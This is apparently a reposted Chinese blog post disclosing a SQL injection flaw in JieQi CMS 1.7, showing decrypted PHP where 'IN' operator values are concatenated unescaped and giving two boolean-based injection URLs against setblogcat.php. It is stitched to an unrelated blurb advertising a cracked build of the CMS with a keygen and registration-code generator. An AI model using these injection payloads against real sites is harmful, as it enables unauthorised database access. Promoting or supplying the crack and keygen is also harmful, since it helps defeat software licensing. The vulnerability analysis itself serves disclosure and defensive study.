杰奇1.7用php53,杰奇CMS 1.7商业版注入漏洞

杰奇CMS 1.7商业版用了Zend加密,批量解密后,发现程序员用了几个函数,使得这套系统基本没了注入漏洞。在判断ip时,程序员将.过滤再判断是否是为数字,值得借鉴。

[php]

class criteria extends criteriaelement

{

var $column; //字段

var $operator; //分隔符

var $value; //值

function criteria( $_obfuscate_eZJe9OBy, $_obfuscate_VgKtFeg = "", $_obfuscate_JChWBNMCFOA = "=" )

{

$this->column = $_obfuscate_eZJe9OBy;

$this->value = $_obfuscate_VgKtFeg;

$this->operator = $_obfuscate_JChWBNMCFOA;

}

function render( )

{

if ( !empty( $this->column ) )

{

$_obfuscate_yHkENun4 = $this->column." ".$this->operator;

..................................

if ( isset( $this->value ) )

..................................

//当分隔符为in时没有对值有任何处理。EditPlus搜索含有"IN"的语句发现了注入。

if ( strtoupper( $this->operator ) == "IN" )

{

$_obfuscate_yHkENun4 .= " ".$this->value;

return $_obfuscate_yHkENun4;

}

//引入单引号

$_obfuscate_yHkENun4 .= " '".jieqi_dbslashes( trim( $this->value ) )."'";

}

return $_obfuscate_yHkENun4;

------------------------------------------------------------------------------------------

switch ( $_REQUEST[action] )

{

case "do_edit" :

include_once( $jieqiModules['space']['path']."/class/blogcat.php" );

$blog_cat_handler = jieqispaceblogcathandler::getinstance( "JieqiSpaceBlogCatHandler" );

if ( $_REQUEST['delete_checkbox'] )

{

$tmpstr = "(".implode( ",", $_REQUEST['delete_checkbox'] ).")";

$criteria = new criteriacompo( new criteria( "`id`", $tmpstr, "in" ) ); //id in ()

$criteria->add( new criteria( "`uid`", $uid ) );

$criteria->add( new criteria( "`type`", $_REQUEST['type'], "=" ) );

$criteria->add( new criteria( "`default_cat`", 1, "!=" ) );

$blog_cat_handler->queryobjects( $criteria );

$v = $blog_cat_handler->getobject( );

if ( !empty( $v ) )

{

$num = $v->getvar( "num" );

$blog_cat_handler->delete( $criteria );

unset( $criteria );

}[/php]

exp:

http://0day5.com/modules/space/setblogcat.php?action=do_edit&delete_checkbox[]=3))and 1=1%23

http://0day5.com/modules/space/setblogcat.php?action=do_edit&delete_checkbox[]=3))and 1=2%23

下载说明: 本破解程序为目前为止最新完美破解版,收集于网络,剔除了广告代码!本站不承担任何责任! 破解注册码在线生成地址: http://你的域名/jieqi-key.php 杰奇小说连载系统杰奇小说wap插件杰奇在线电子书系统杰奇在线漫画系统杰奇分类信息系统杰奇个人空间系统杰奇圈子交友系统杰奇在线充值系统杰奇新闻系统杰奇产品发布系统杰奇投票调查系统杰奇留言系统杰奇问答系统杰奇论坛系统 并含有注册机。 杰奇网站管理系统(简称 JIEQI CMS,中国国家版权局著作权登记号 2006SR03382)是从深受好评的杰奇小说连载系统基础上发展而来的全功能、高性能、高可靠性 CMS 系统。 是企业和个人建设各类门户网站、信息发布网站的理想平台。 JIEQI CMS采用灵活、快速、可靠的 PHP 动态语言开发,配合 MySQL 数据库以及开源的 Linux/Unix 操作系统,设立了自动缓存机制,能够以最低的成本完成大流量网站的建设。 · 系统需求 要发挥 JIEQI CMS 系统的全部效能,我们建议使用如下的服务器配置。 操作系统 Windows,Linux(推荐)/Unix,包括 RedHat、SuSE Linux、Debian 以及 FreeBSD、OpenBSD 等, PHP 运行环境 PHP版本需要 4.33 以上,推荐官方稳定版,并且安装了 Zend Optimizer 3.0以上 MySQL 数据库 要获得最佳运行效率,请使用 MySQL 4.0 以上版本数据库 Web 服务器 JIEQI CMS 可以完美工作在 Apache/Apache2、IIS、lighttpd 等 Web 服务器平台上 * 虚拟主机 虽然我们建议您在独立服务器上运行 JIEQI CMS 系统,但我们也为需要在虚拟主机上运行 JIEQI CMS 系统的用户提供全面的运行环境检查服务 系统特色 灵活架构 - 基于框架的开发模式,程序拥有统一的底层接口,小说、论坛、电子书、新闻等都作为独立的模块挂接在上面,具有良好的扩展性能。 高效稳定 - 本系统经历多年完善和各种服务器环境的应用测试,具备很高的系统稳定性和性能,已实际应用于日访问千万级别的网站。 模板分离 - 使用编译型模板,模板主要用于实现程序和美工的分离,用户通过修改模板可以实现自己的网站风格。 自动缓存 - 对于不常更新的内容,生成html格式的静态文件,只有在内容变化时更新静态文件(如文章内容,阅读时都是html文件,只有在修改或者增加内容时才更新)。 对于频繁变化的信息,用户可以设置缓存时间。(如排行榜,虽然是实时变化的,但用户可以设置成半小时更新一次,这样大大减少了系统资源) 繁简双语 - 程序实现了网站内容繁体(big5)和简体(gb312)的相互转换,默认为简体中文。 权限管理 - 细化的权限分类和无限用户等级相结合,用户可以自由设置用户的等级类别,并且针对具体某个权限设置每个等级是否拥有。 区块管理/广告管理 - 区块是指网页上一个独立的内容块,比如用户登陆区块、热门文章前10条。区块分为系统区块和自定义区块,后台可以安排各个区块是否显示以及在首页的显示位置。自定义区块允许用户自己填入标题和内容,这样就很方便实现公告的发布以及广告的安排。 先按照说明安装好程序; 再打开注册码生成地址生成注册码, 把生成好的注册码复进后台的注册码输入框里; 如果你喜欢该软件,请支持正版!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值